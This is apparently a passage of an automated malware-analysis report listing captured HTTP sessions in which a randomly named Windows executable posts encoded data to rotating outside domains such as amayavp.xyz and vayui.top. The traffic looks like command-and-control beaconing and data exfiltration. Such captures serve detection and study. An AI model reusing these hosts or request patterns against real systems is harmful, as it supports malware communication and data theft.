                                                                            Data Raw: 31 62 38 0d 0a a1 f0 19 00 20 d3 72 fa fa 72 cc c2 85 08 da 90 94 cc fc b5 fe a6 58 dd 37 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 a9 3b 3d d4 aa 05 f0 93 8a f6 0c 93 99 09 8b b4 bf 80 a0 6e 66 37 66 ca d7 73 29 cb 09 46 ce 22 f2 00 a7 82 fe fc ae bc 1f 32 59 94 a6 28 eb 60 23 48 95 09 ee c0 61 49 7b 4c 24 42 ff 10 f7 c3 ff 14 89 a7 b0 8d d0 01 ae 15 af 3f bf b1 d7 44 eb 5d a3 69 5d 3f 3f 97 42 d1 5f fa 7b fa 17 93 b9 d6 d7 f3 b9 d9 5d ea f0 a5 60 1e 07 0d 21 6e eb bc 6a 37 fd fb b6 57 ed 38 46 21 d6 11 91 b5 ff 6c 7f 5f c2 1c 96 10 a2 f8 e2 52 02 0d 22 22 97 5d f6 86 84 fe d7 db 33 1a a0 ff 80 6d 29 84 35 ca e7 ca 10 42 3d 57 b2 70 92 89 86 f2 56 a8 dc 72 88 b0 b5 79 ad 0a c6 b9 a3 21 84 42 3a a6 14 2f 54 2e 14 15 85 b0 5c b5 8b 7c 80 dc 63 52 14 ce 85 06 e1 5e 98 3c 50 ee 08 25 96 98 a0 4c db e7 d4 d2 11 57 7e e2 b6 8d 9e 00 a6 34 fc fd 5d 86 c5 52 c3 18 69 88 60 e7 af ef 3f 52 1f dc 7c 37 5d 46 0e 53 6c b0 45 28 86 15 88 cc 0f 75 ab [TRUNCATED]
                                                                            Data Ascii: 1b8 rrX7pNN57KNnv=sk%;=nf7fs)F"2Y(`#HaI{L$B?D]i]??B_{]`!nj7W8F!l_R""]3m)5B=WpVry!B:/T.\|cR^<P%LW~4]Ri`?R|7]FSlE(u.5eUGYOny5Xe=M .p-D)<fJZJoQZdV!rP*gf:#0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            16 | 192.168.2.8 | 49728 | 185.27.134.144 | 80 | 5960 | C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:31:57.894366026 CET | 768 | OUT | POST /d9ku/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.amayavp.xyz
                                                                            Origin: http://www.amayavp.xyz
                                                                            Referer: http://www.amayavp.xyz/d9ku/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 42 63 6e 78 59 59 74 44 61 68 53 58 63 46 62 32 71 55 64 6b 4a 75 74 50 58 78 4e 42 58 61 69 4d 55 67 72 4d 70 34 6c 65 31 4a 4a 73 6e 6e 6b 4a 71 59 65 44 39 4d 37 75 53 67 68 6e 52 79 37 49 51 6e 64 38 42 44 45 6b 70 7a 47 74 51 2f 4a 77 4e 70 32 6f 7a 66 38 4b 7a 47 6b 69 35 31 57 33 57 41 77 72 36 37 67 72 73 47 57 70 45 6a 41 2b 57 44 2b 6d 42 73 67 61 45 61 59 6e 62 7a 6e 72 64 4d 2f 66 6d 55 74 32 42 79 66 47 30 6b 4e 58 42 4f 50 2f 36 42 42 7a 51 38 56 4b 59 44 46 44 45 77 4e 78 53 51 47 5a 62 61 4d 2b 63 33 79 6a 55 4c
                                                                            Data Ascii: jNn=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzBcnxYYtDahSXcFb2qUdkJutPXxNBXaiMUgrMp4le1JJsnnkJqYeD9M7uSghnRy7IQnd8BDEkpzGtQ/JwNp2ozf8KzGki51W3WAwr67grsGWpEjA+WD+mBsgaEaYnbznrdM/fmUt2ByfG0kNXBOP/6BBzQ8VKYDFDEwNxSQGZbaM+c3yjUL
                                                                            Jan 11, 2025 03:31:58.520096064 CET | 682 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:31:58 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                            Cache-Control: no-cache
                                                                            Content-Encoding: br
                                                                            Data Raw: 31 62 38 0d 0a a1 f0 19 00 20 d3 72 fa fa 72 cc c2 85 08 da 90 94 cc fc b5 fe a6 58 dd 37 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 a9 3b 3d d4 aa 05 f0 93 8a f6 0c 93 99 09 8b b4 bf 80 a0 6e 66 37 66 ca d7 73 29 cb 09 46 ce 22 f2 00 a7 82 fe fc ae bc 1f 32 59 94 a6 28 eb 60 23 48 95 09 ee c0 61 49 7b 4c 24 42 ff 10 f7 c3 ff 14 89 a7 b0 8d d0 01 ae 15 af 3f bf b1 d7 44 eb 5d a3 69 5d 3f 3f 97 42 d1 5f fa 7b fa 17 93 b9 d6 d7 f3 b9 d9 5d ea f0 a5 60 1e 07 0d 21 6e eb bc 6a 37 fd fb b6 57 ed 38 46 21 d6 11 91 b5 ff 6c 7f 5f c2 1c 96 10 a2 f8 e2 52 02 0d 22 22 97 5d f6 86 84 fe d7 db 33 1a a0 ff 80 6d 29 84 35 ca e7 ca 10 42 3d 57 b2 70 92 89 86 f2 56 a8 dc 72 88 b0 b5 79 ad 0a c6 b9 a3 21 84 42 3a a6 14 2f 54 2e 14 15 85 b0 5c b5 8b 7c 80 dc 63 52 14 ce 85 06 e1 5e 98 3c 50 ee 08 25 96 98 a0 4c db e7 d4 d2 11 57 7e e2 b6 8d 9e 00 a6 34 fc fd 5d 86 c5 52 c3 18 69 88 60 e7 af ef 3f 52 1f dc 7c 37 5d 46 0e 53 6c b0 45 28 86 15 88 cc 0f 75 ab [TRUNCATED]
                                                                            Data Ascii: 1b8 rrX7pNN57KNnv=sk%;=nf7fs)F"2Y(`#HaI{L$B?D]i]??B_{]`!nj7W8F!l_R""]3m)5B=WpVry!B:/T.\|cR^<P%LW~4]Ri`?R|7]FSlE(u.5eUGYOny5Xe=M .p-D)<fJZJoQZdV!rP*gf:#0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            17 | 192.168.2.8 | 49729 | 185.27.134.144 | 80 | 5960 | C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:32:00.442199945 CET | 1785 | OUT | POST /d9ku/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.amayavp.xyz
                                                                            Origin: http://www.amayavp.xyz
                                                                            Referer: http://www.amayavp.xyz/d9ku/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 1240
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 4a 63 6e 43 67 59 74 6b 4f 68 54 58 63 46 48 6d 71 56 64 6b 4a 76 74 50 2b 34 4e 47 66 73 69 50 67 67 35 65 68 34 6a 76 31 4a 65 38 6e 6e 6d 4a 71 62 42 7a 38 49 37 75 43 6b 68 6d 68 79 37 49 51 6e 64 36 6c 44 55 6c 70 7a 45 74 51 34 44 51 4e 31 6b 59 7a 6e 38 4b 62 73 6b 69 73 4f 57 47 71 41 7a 4c 71 37 6e 4f 41 47 4b 35 45 68 54 4f 57 68 2b 6d 4d 32 67 61 5a 68 59 6e 66 5a 6e 6f 4e 4d 37 2f 72 74 2b 6e 4d 71 4d 55 34 36 43 41 5a 66 57 64 4b 59 4a 68 45 45 50 59 51 37 4d 6e 6f 4c 64 78 53 2f 50 4f 36 42 50 61 38 48 6a 57 6f 46 4d 64 7a 68 2f 58 61 38 37 47 70 42 4c 2b 6a 4c 35 71 37 66 30 77 63 4f 2b 6c 75 46 77 6c 49 73 73 4f 58 64 76 56 41 71 4d 67 4e 79 2f 53 51 59 75 6e 6e 75 72 61 70 4b 52 4d 7a 74 36 6e 78 65 2b 6e 48 47 63 47 53 42 42 4b 61 47 4d 58 34 52 4f 47 39 48 70 4c 4e 50 75 68 72 2b 4c 76 69 52 6c 70 57 4b 53 34 49 6c 69 48 74 70 55 56 58 4e 7a 39 [TRUNCATED]
                                                                            Data Ascii: jNn=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 [TRUNCATED]
                                                                            Jan 11, 2025 03:32:01.061295033 CET | 682 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:32:00 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                            Cache-Control: no-cache
                                                                            Content-Encoding: br
                                                                            Data Raw: 31 62 38 0d 0a a1 f0 19 00 20 d3 72 fa fa 72 cc c2 85 08 da 90 94 cc fc b5 fe a6 58 dd 37 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 a9 3b 3d d4 aa 05 f0 93 8a f6 0c 93 99 09 8b b4 bf 80 a0 6e 66 37 66 ca d7 73 29 cb 09 46 ce 22 f2 00 a7 82 fe fc ae bc 1f 32 59 94 a6 28 eb 60 23 48 95 09 ee c0 61 49 7b 4c 24 42 ff 10 f7 c3 ff 14 89 a7 b0 8d d0 01 ae 15 af 3f bf b1 d7 44 eb 5d a3 69 5d 3f 3f 97 42 d1 5f fa 7b fa 17 93 b9 d6 d7 f3 b9 d9 5d ea f0 a5 60 1e 07 0d 21 6e eb bc 6a 37 fd fb b6 57 ed 38 46 21 d6 11 91 b5 ff 6c 7f 5f c2 1c 96 10 a2 f8 e2 52 02 0d 22 22 97 5d f6 86 84 fe d7 db 33 1a a0 ff 80 6d 29 84 35 ca e7 ca 10 42 3d 57 b2 70 92 89 86 f2 56 a8 dc 72 88 b0 b5 79 ad 0a c6 b9 a3 21 84 42 3a a6 14 2f 54 2e 14 15 85 b0 5c b5 8b 7c 80 dc 63 52 14 ce 85 06 e1 5e 98 3c 50 ee 08 25 96 98 a0 4c db e7 d4 d2 11 57 7e e2 b6 8d 9e 00 a6 34 fc fd 5d 86 c5 52 c3 18 69 88 60 e7 af ef 3f 52 1f dc 7c 37 5d 46 0e 53 6c b0 45 28 86 15 88 cc 0f 75 ab [TRUNCATED]
                                                                            Data Ascii: 1b8 rrX7pNN57KNnv=sk%;=nf7fs)F"2Y(`#HaI{L$B?D]i]??B_{]`!nj7W8F!l_R""]3m)5B=WpVry!B:/T.\|cR^<P%LW~4]Ri`?R|7]FSlE(u.5eUGYOny5Xe=M .p-D)<fJZJoQZdV!rP*gf:#0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            18 | 192.168.2.8 | 49730 | 185.27.134.144 | 80 | 5960 | C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:32:02.989187956 CET | 489 | OUT | GET /d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K9aiv+zbDkEKhMSDsVMvwPhhINhuEU9ODct9Lj1wj6urmQ==&3P=ZxaxIFQ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.amayavp.xyz
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Jan 11, 2025 03:32:03.584242105 CET | 1180 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:32:03 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 979
                                                                            Connection: close
                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                            Cache-Control: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                            Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("188cce714d5a0e24c121b1ae9afd02b2");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K9aiv+zbDkEKhMSDsVMvwPhhINhuEU9ODct9Lj1wj6urmQ==&3P=ZxaxIFQ&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                            Session ID: 19
                                                                            Source IP: 192.168.2.8
                                                                            Source Port: 49731
                                                                            Destination IP: 104.21.95.160
                                                                            Destination Port: 80
                                                                            PID: 5960
                                                                            Process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp: Jan 11, 2025 03:32:08.983369112 CET | Bytes transferred: 742 | Direction: OUT
                                                                            POST /vg0z/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.vayui.top
                                                                            Origin: http://www.vayui.top
                                                                            Referer: http://www.vayui.top/vg0z/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Ascii: jNn=27GE0W46HILaWqVWdN5BjjKO9GC8sMWxM9iD24PZ/SC0QCX8WkjX8Cr0rLPAADpGnWkezVMK99dz72VZ02dkQaCK3r4aVjYpsiO7UgjlVoibF4zUe+a9vwYHjROlu5AgZuwKfOACEZav7eQQ/PfaXLJ76iC+T3BDVmWRMK2phzVZze7p0m9VdZsecQcGSEj00ah5Jqw=
                                                                            Timestamp: Jan 11, 2025 03:32:09.560853004 CET | Bytes transferred: 808 | Direction: IN
                                                                            HTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:09 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nQpzubfE7qDjNsccnRBOi91m%2F830GH6MVHFluiwayqpVG0TZlnjwobWd9vErmg0KUCPl6zRsX%2Fg9tx%2B697jRxTuy5g0n2RTdT69UejvYG0F77lZu8%2FuGOjRsoUu2Gr31"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017ea29cea80dc-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=742&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                            Data Ascii: f
                                                                            Timestamp: Jan 11, 2025 03:32:09.561559916 CET | Bytes transferred: 110 | Direction: IN
                                                                            Data Raw: 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9
                                                                            Data Ascii: 63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                            Session ID: 20
                                                                            Source IP: 192.168.2.8
                                                                            Source Port: 49732
                                                                            Destination IP: 104.21.95.160
                                                                            Destination Port: 80
                                                                            PID: 5960
                                                                            Process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp: Jan 11, 2025 03:32:11.536220074 CET | Bytes transferred: 762 | Direction: OUT
                                                                            POST /vg0z/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.vayui.top
                                                                            Origin: http://www.vayui.top
                                                                            Referer: http://www.vayui.top/vg0z/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Ascii: jNn=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hm0Qmb8YFjX1Sr0krPYOjpPnWY8zXIK95Nz70NZ0ndlSKCEsb4cbDYpsiO7UkKtVpKbFIDUefa+wAYGiROl/pAkZuxZfKBnEbiv7acQ+d3ZeLJ55SD9DU0mb2CeC868vyls7IKDuE1TeZE1cT0wXz+cu5xJX9lO9KJUonFZpDd+ld/R9EU6
                                                                            Timestamp: Jan 11, 2025 03:32:12.139859915 CET | Bytes transferred: 916 | Direction: IN
                                                                            HTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:12 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W34E5nxdZdtBhfjX%2BmpzPfHvbzTdLG2KayogoGRoOS0%2BwkxY8%2FG%2Bc30IqOSkUhoY3mLrrtZcILceD1k2%2Famu%2BMvBgQFoc%2BkDaie7qxDVyuG154v0Ptzs6EqXJ%2B2i7bs0"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017eb29c0c43be-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1985&rtt_var=992&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                            Session ID: 21
                                                                            Source IP: 192.168.2.8
                                                                            Source Port: 49733
                                                                            Destination IP: 104.21.95.160
                                                                            Destination Port: 80
                                                                            PID: 5960
                                                                            Process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp: Jan 11, 2025 03:32:14.079730988 CET | Bytes transferred: 1779 | Direction: OUT
                                                                            POST /vg0z/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.vayui.top
                                                                            Origin: http://www.vayui.top
                                                                            Referer: http://www.vayui.top/vg0z/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 1240
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Ascii: jNn= [TRUNCATED]
                                                                            Timestamp: Jan 11, 2025 03:32:14.683618069 CET | Bytes transferred: 909 | Direction: IN
                                                                            HTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:14 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OY16Brr0AgkwysVM%2BDM%2FBWfwLR3vSZem4EL4kHPhJaaLtz803TxVr4fjOTky6g2QgAo8W8M992RgaGh3i8ia9AsE70ctgq%2BC%2F3qTUHZBVScLW9VUqL3aLikHAhnxP9zf"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017ec27d2b0f8f-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1468&min_rtt=1468&rtt_var=734&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1779&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                            Session ID: 22
                                                                            Source IP: 192.168.2.8
                                                                            Source Port: 49734
                                                                            Destination IP: 104.21.95.160
                                                                            Destination Port: 80
                                                                            PID: 5960
                                                                            Process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp: Jan 11, 2025 03:32:16.624221087 CET | Bytes transferred: 487 | Direction: OUT
                                                                            GET /vg0z/?jNn=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGqSKo7wbbDBvpzyjUmzrS97fS4i7YPii/B0AmEK1pqpQFw==&3P=ZxaxIFQ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.vayui.top
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Timestamp: Jan 11, 2025 03:32:17.220102072 CET | Bytes transferred: 923 | Direction: IN
                                                                            HTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:17 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4%2B09MgFYcWAG5J8mNztaSHuhAS%2BUXSaIHMNKNC3fLXjktZ%2BS5aLCQtf78CZeb6Ze5ZnlEcUJ9eGpRmA6SWwfYH76NOyUHQt4CSoI%2F%2BTDYUKw3oQf2tofayg9wGQbRkc"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017ed26b616a55-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1535&rtt_var=767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                            Session ID: 23
                                                                            Source IP: 192.168.2.8
                                                                            Source Port: 49735
                                                                            Destination IP: 188.114.97.3
                                                                            Destination Port: 80
                                                                            PID: 5960
                                                                            Process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp: Jan 11, 2025 03:32:22.275620937 CET | Bytes transferred: 766 | Direction: OUT
                                                                            POST /o362/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.rgenerousrs.store
                                                                            Origin: http://www.rgenerousrs.store
                                                                            Referer: http://www.rgenerousrs.store/o362/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
